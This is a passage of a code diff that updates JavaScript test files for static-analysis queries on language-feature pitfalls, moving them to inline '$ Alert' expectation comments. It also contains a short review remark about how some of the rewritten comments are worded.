+++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js @@ -1,3 +1,3 @@ -function window::onload() {} +function window::onload() {} // $ Alert window.onload = function onload() {} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js index a5c7a09b6be5..7c4b6c4eb804 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js @@ -1,5 +1,5 @@ var x = 42, y = 19; -console.log(let (x = 23, y = 19) x + y); +console.log(let (x = 23, y = 19) x + y); // $ Alert console.log(x - y); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js index 69beaac8a096..3b62e7f0d14c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js @@ -2,6 +2,6 @@ var x = 42, y = 19; let (x = 23, y = 19) { console.log(x + y); -} +} // $ Alert console.log(x - y); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js index 3cca1b5c615f..181c90cfa7fe 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js @@ -1,4 +1,4 @@ var numbers = [1, 2, 3, 4, 5]; -var squares = [i*i for (i of numbers)]; +var squares = [i*i for (i of numbers)]; // $ Alert var specialKeyCodes = [for (keyCodeName of Object.keys(SPECIAL_CODES_MAP)) SPECIAL_CODES_MAP[keyCodeName]]; 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js index 202ea2a262a6..610590712eeb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js @@ -1,8 +1,7 @@ -// NOT OK -[1, 2, 3].map(function(x) x * x); +[1, 2, 3].map(function(x) x * x); // $ Alert + -// OK [1, 2, 3].map(function(x) { return x * x; }); -// OK + [1, 2, 3].map((x) => x * x); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref index 57bc034bdf70..d5b6deb7355b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref @@ -1 +1,2 @@ -LanguageFeatures/ForInComprehensionBlocks.ql \ No newline at end of file +query: LanguageFeatures/ForInComprehensionBlocks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js index 08542e2be521..3ada68d3cf02 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js @@ -1,2 +1,2 @@ var a = [23,,42]; -var desc = [for(i in a) i + " = a[" + i + "]"]; +var desc = [for(i in a) i + " = a[" + i + "]"]; // $ Alert 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref index 1297139b9f9a..d1cf5afbb2ac 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref @@ -1 +1,2 @@ -LanguageFeatures/IllegalInvocation.ql \ No newline at end of file +query: LanguageFeatures/IllegalInvocation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 3ed85a709341..48af86687794 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js @@ -4,24 +4,24 @@ class C { class D extends C { constructor() { - super(); // OK + super(); } } -let c = new C(); // OK -C(); // NOT OK -new (x=>x); // NOT OK -c.m(); // OK -new c.m(); // NOT OK - but not flagged +let c = new C(); +C(); // $ Alert +new (x=>x); // $ Alert +c.m(); +new c.m(); // $ MISSING: Alert var o = { f: function() {}, g() {} }; -o.f(); // OK -new o.f(); // OK -o.g(); // OK -new o.g(); // NOT OK - but not flagged +o.f(); +new o.f(); +o.g(); +new o.g(); // $ MISSING: Alert function f(b) { var g; 
@@ -31,31 +31,31 @@ function f(b) { g = (() => {}); console.log(); if (!b) - g(); // OK + g(); else - new g(); // OK + new g(); } function* g() {} async function h() {} -new g() // NOT OK -new h() // NOT OK +new g() // $ Alert +new h() // $ Alert -C.call(); // NOT OK -C.apply(); // NOT OK +C.call(); // $ Alert +C.apply(); // $ Alert class E { static call() {} static apply() {} } -E.call(); // OK -E.apply(); // OK +E.call(); +E.apply(); function invoke(fn) { if (typeof fn === "function" && fn.hasOwnProperty("foo")) { - fn(); // OK + fn(); } } invoke(C); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected index 0c03a59fd223..e2aa2ed56f3e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected @@ -1,2 +1,2 @@ -| m.js:1:8:1:22 | functio ... = x;\\n} | Function A is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | c1.js:2:1:2:9 | new A(42) | here | c2.js:2:1:2:5 | A(23) | here | -| tst.js:1:1:1:22 | functio ... = y;\\n} | Function Point is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | tst.js:6:1:6:17 | new Point(23, 42) | here | tst.js:7:1:7:13 | Point(56, 72) | here | +| m.js:1:8:1:33 | functio ... = x;\\n} | Function A is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | c1.js:2:1:2:9 | new A(42) | here | c2.js:2:1:2:5 | A(23) | here | +| tst.js:1:1:1:33 | functio ... = y;\\n} | Function Point is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | tst.js:6:1:6:17 | new Point(23, 42) | here | tst.js:7:1:7:13 | Point(56, 72) | here | 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref index 8c5695ffb85c..a03be885e21c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref @@ -1 +1,2 @@ -LanguageFeatures/InconsistentNew.ql \ No newline at end of file +query: LanguageFeatures/InconsistentNew.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js index 1585d8add718..3ecf658e45c9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js @@ -1,3 +1,3 @@ function A() {} -new A(); // OK -String(""); // OK \ No newline at end of file +new A(); +String(""); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js index 407b91aec013..1c9f2e07a49a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js @@ -1,6 +1,6 @@ function A() {} -A(); // OK +A(); function MyString() {} String = MyString; -new String(); // OK \ No newline at end of file +new String(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js index 6aaeaa7a9f18..a3477727286b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js 
@@ -1,2 +1,2 @@ -Array(45); // OK -new Array(45); // OK +Array(45); +new Array(45); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js index 416caeb40635..1bc9fbf5f537 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js @@ -1,3 +1,3 @@ -export function A(x) { +export function A(x) { // $ Alert this.x = x; }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js index 56af21411b67..fb22e98ade67 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js @@ -1,4 +1,4 @@ -function Point(x, y) { +function Point(x, y) { // $ Alert this.x = x; this.y = y; } @@ -48,13 +48,13 @@ function RobustPoint4(x, y) { new RobustPoint4(23, 42); RobustPoint4(56, 72); -// OK: Error is an external function +// OK - Error is an external function new Error(); Error(); class C {} new C(); -C(); // NOT OK, but flagged by IllegalInvocation +C(); // OK - flagged by IllegalInvocation (function() { function A(x) { @@ -64,5 +64,5 @@ C(); // NOT OK, but flagged by IllegalInvocation A.call({}, 23); })(); -new Point(42, 23); // NOT OK, but not flagged since line 6 above was already flagged -Point(56, 72); // NOT OK, but not flagged since line 7 above was already flagged +new Point(42, 23); // OK - not flagged since line 6 above was already flagged +Point(56, 72); // OK - not flagged since line 7 above was already flagged diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref index 04e81233ed77..307244114cbc 100644 
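Review bot: In InconsistentNew/tst.js (hunks `-48,13` and `-64,5`) the rewritten comments on `C();`, `new Point(42, 23);` and `Point(56, 72);` now start with `OK`, although the old text marked these calls as NOT OK and only said that this query does not report them. Elsewhere in this commit `OK` is used for code that is genuinely fine, so these lines now read as true negatives rather than deliberately suppressed duplicates. Assuming the expectations postprocessor only parses `$`-prefixed comments, wording such as `C(); // Not reported here - flagged by IllegalInvocation` and `new Point(42, 23); // Not reported - line 6 above was already flagged` would keep the distinction without changing the test outcome. The same wording appears in PropertyWriteOnPrimitive/tst.js at `null.bar = 23; undefined.baz = 42; // OK - already flagged by SuspiciousPropAccess.ql`.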
--- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref @@ -1 +1,2 @@ -LanguageFeatures/InvalidPrototype.ql \ No newline at end of file +query: LanguageFeatures/InvalidPrototype.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js index 1015db92cff4..5c12a3b7d853 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js @@ -1,11 +1,11 @@ -var o1 = { __proto__: null }; // OK -Object.setPrototypeOf(o1, Function.prototype); // OK -Object.create(class{}); // OK -Function.prototype.isPrototypeOf(o1); // OK -o1.__proto__ = new Date(); // OK +var o1 = { __proto__: null }; +Object.setPrototypeOf(o1, Function.prototype); +Object.create(class{}); +Function.prototype.isPrototypeOf(o1); +o1.__proto__ = new Date(); -var o2 = { __proto__: undefined }; // NOT OK -Object.setPrototypeOf(o2, 42); // NOT OK -Object.create(true); // NOT OK -"function".isPrototypeOf(o2); // NOT OK +var o2 = { __proto__: undefined }; // $ Alert +Object.setPrototypeOf(o2, 42); // $ Alert +Object.create(true); // $ Alert +"function".isPrototypeOf(o2); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref index f76a131eff46..6404cd83590e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/JumpFromFinally.qlref 
@@ -1 +1,2 @@ -LanguageFeatures/JumpFromFinally.ql \ No newline at end of file +query: LanguageFeatures/JumpFromFinally.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js index 0cf40521ad93..d875f1c1d03e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/JumpFromFinally/tst.js @@ -4,7 +4,7 @@ function foo(resource) { throw new Error(); } finally { resource.close(); - return true; + return true; // $ Alert } } @@ -25,7 +25,7 @@ function baz(resource) { throw new Error(); } finally { resource.close(); - break; + break; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected index 2af10be24c0d..c9b2667e9e74 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected 
@@ -1,7 +1,7 @@ -| tst.js:2:17:2:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:3:15:3:21 | args[i] | read | -| tst.js:7:17:7:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:8:15:8:21 | args[i] | read | -| tst.js:18:5:18:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:19:15:19:21 | args[j] | read | -| tst.js:23:5:23:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:24:15:24:21 | args[j] | read | -| tst.js:34:19:34:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:35:9:35:12 | a[i] | read | -| tst.js:51:9:51:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:43:51:46 | a[i] | read | -| tst.js:51:26:51:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:52:51:55 | b[i] | read | +| tst.js:1:17:1:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:2:15:2:21 | args[i] | read | +| tst.js:5:17:5:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:6:15:6:21 | args[i] | read | +| tst.js:15:5:15:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:16:15:16:21 | args[j] | read | +| tst.js:19:5:19:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:20:15:20:21 | args[j] | read | +| tst.js:29:19:29:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:30:9:30:12 | a[i] | read | +| tst.js:46:9:46:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. 
| tst.js:46:43:46:46 | a[i] | read | +| tst.js:46:26:46:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:52:46:55 | b[i] | read | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref index 4b12bd2f70ba..2514b6d76698 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.qlref @@ -1 +1,2 @@ -LanguageFeatures/LengthComparisonOffByOne.ql \ No newline at end of file +query: LanguageFeatures/LengthComparisonOffByOne.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js index c819b10ad56a..6b214c9b0423 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js 
@@ -1,43 +1,38 @@ -// BAD: Loop upper bound is off-by-one -for (var i = 0; i <= args.length; i++) { +for (var i = 0; i <= args.length; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// BAD: Loop upper bound is off-by-one -for (var i = 0; args.length >= i; i++) { +for (var i = 0; args.length >= i; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// GOOD: Loop upper bound is correct +// OK - Loop upper bound is correct for (var i = 0; i < args.length; i++) { console.log(args[i]); } var j = 0; -// BAD: Off-by-one on index validity check -if (j <= args.length) { +if (j <= args.length) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// BAD: Off-by-one on index validity check -if (args.length >= j) { +if (args.length >= j) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// GOOD: Correct terminating value +// OK - Correct terminating value if (args.length > j) { console.log(args[j]); } -// BAD: incorrect upper bound -function badContains(a, elt) { - for (let i = 0; i <= a.length; ++i) +function badContains(a, elt) { // incorrect upper bound + for (let i = 0; i <= a.length; ++i) // $ Alert if (a[i] === elt) return true; return false; } -// GOOD: correct upper bound +// OK - correct upper bound function goodContains(a, elt) { for (let i = 0; i < a.length; ++i) if (a[i] === elt) @@ -48,12 +43,12 @@ function goodContains(a, elt) { // this is arguably OK, but we flag it function same(a, b) { for (var i=0; i < a.length || i < b.length ; ++i) - if (i <= a.length && i <= b.length && a[i] !== b[i]) + if (i <= a.length && i <= b.length && a[i] !== b[i]) // $ Alert return false; return true; } -// GOOD: incorrect upper bound, but extra check +// OK - incorrect upper bound, but extra check function badContains(a, elt) { for (let i = 0; i <= a.length; ++i) if (i !== a.length && a[i] === elt) 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected index 2f61724a5661..31d9fc228113 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected 
@@ -1,11 +1,11 @@ | NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound | -| ts-test.ts:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:3:10:3:10 | x | previously bound | -| ts-test.ts:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:10:8:10 | x | previously bound | -| ts-test.ts:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:11:7:11:7 | x | previously bound | -| ts-test.ts:21:8:21:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:20:8:20:13 | string | previously bound | -| ts-test.ts:32:16:32:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:34:20:34:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:40:27:40:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:40:16:40:21 | string | previously bound | -| tst.js:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:3:10:3:10 | x | previously bound | -| tst.js:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:10:8:10 | x | previously bound | -| tst.js:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:11:7:11:7 | x | previously bound | +| ts-test.ts:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:2:10:2:10 | x | previously bound | +| ts-test.ts:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:6:10:6:10 | x | previously bound | +| ts-test.ts:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:7:8:7 | x | previously bound | +| ts-test.ts:18:8:18:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. 
| ts-test.ts:17:8:17:13 | string | previously bound | +| ts-test.ts:29:16:29:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:31:20:31:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:37:27:37:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:37:16:37:21 | string | previously bound | +| tst.js:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:2:10:2:10 | x | previously bound | +| tst.js:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:6:10:6:10 | x | previously bound | +| tst.js:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:7:8:7 | x | previously bound | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref index 322a10d00085..5684a790f6cc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.qlref @@ -1 +1,2 @@ -LanguageFeatures/NonLinearPattern.ql \ No newline at end of file +query: LanguageFeatures/NonLinearPattern.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts index d19e8bb327fc..2ff108ddb8a1 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPatternTS.ts @@ -1,3 +1,3 @@ -function distance({x: number, y: number}) { +function distance({x: number, y: number}) { // $ Alert return Math.sqrt(x*x + y*y); } 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts index 1198d2c5ff74..120fa7098ee5 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts @@ -1,41 +1,38 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; function f({ x: string, - y: string // NOT OK + y: string // $ Alert }) { } -function g({x, y}: {x: string, y: string}) { // OK +function g({x, y}: {x: string, y: string}) { } function blah(arg) { var { x: x, y: { - x: x, // NOT OK + x: x, // $ Alert y: { - x: x // NOT OK + x: x // $ Alert } } } = arg; } -function h({x: string, y: string}: any) { // NOT OK +function h({x: string, y: string}: any) { // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js index 0e6b79f4675f..017499000358 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js @@ -1,17 +1,14 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected index 9dcd49a99d3f..75d8c23b51f6 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected @@ -1,3 +1,3 @@ -| tst.js:2:1:2:3 | (0) | Assignment to property foo of a primitive value with type number. | -| tst.js:11:5:11:5 | s | Assignment to a property of a primitive value with type string. | -| tst.js:17:3:17:3 | x | Assignment to property y of a primitive value with type number or string. | +| tst.js:1:1:1:3 | (0) | Assignment to property foo of a primitive value with type number. | +| tst.js:8:5:8:5 | s | Assignment to a property of a primitive value with type string. | +| tst.js:13:3:13:3 | x | Assignment to property y of a primitive value with type number or string. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref index f57cf67c800c..6dccd34408b6 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.qlref @@ -1 +1,2 @@ -LanguageFeatures/PropertyWriteOnPrimitive.ql \ No newline at end of file +query: LanguageFeatures/PropertyWriteOnPrimitive.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js index 5d83bad877dc..a74ffbc860a2 100644 
--- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js @@ -1,24 +1,20 @@ -// NOT OK -(0).foo = 42; +(0).foo = 42; // $ Alert -// NOT OK, but already flagged by SuspiciousPropAccess.ql -null.bar = 23; undefined.baz = 42; +null.bar = 23; undefined.baz = 42; // OK - already flagged by SuspiciousPropAccess.ql function f() { var s = ""; for (var i=0;i<10;++i) - // NOT OK - s[i] = " "; + s[i] = " "; // $ Alert } function g(b) { var x = b ? "" : 42, z; - // NOT OK - x.y = true; - // OK: we don't know the type of `b` + x.y = true; // $ Alert + // OK - we don't know the type of `b` b.y = true; return; - // OK: no types inferred for `z`, since this is dead code + // OK - no types inferred for `z`, since this is dead code z.y = true; } @@ -26,4 +22,4 @@ function h() { let tmp; let obj = (tmp ||= {}); obj.p = 42; -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref index 2419fbd90b9b..b84aceb435ad 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/SemicolonInsertion.qlref @@ -1 +1,2 @@ -LanguageFeatures/SemicolonInsertion.ql +query: LanguageFeatures/SemicolonInsertion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js index 7e06517fe174..4c95a6eb67dc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js +++ 